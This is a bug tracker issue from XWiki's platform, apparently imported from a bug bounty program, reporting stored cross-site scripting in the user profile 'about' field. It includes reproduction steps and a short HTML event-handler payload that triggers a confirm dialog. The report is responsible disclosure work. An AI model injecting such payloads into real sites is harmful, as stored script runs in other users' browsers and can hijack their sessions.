XWiki Platform / XWIKI-20348

SXSS via source in text area

    Description

      SUBMISSION REFERENCES

      RESEARCHER INFORMATION

      • Submitter: ynoof

      SUBMISSION INFORMATION

      • Created at: Fri, 04 Nov 2022 14:36:49 GMT
      • Submission status: Archived

      REPORT CONTENT

      Stored XSS at user profile via `about` text area.

      Steps to reproduce

        1. Go to user profile
        2. Add the following payload in the `about` text area.

      ```html
      '"<!--><Details Open OnToggle=confirm("Ynoof/Was/Here")>
      ```

      Click on source before saving.

      POC {186066}

      Thanks,
      Ynoof

      Attachments

        1. 186066_poc.png
          70 kB
          Intigriti Integration

            People

              MichaelHamann Michael Hamann
              intigriti Intigriti Integration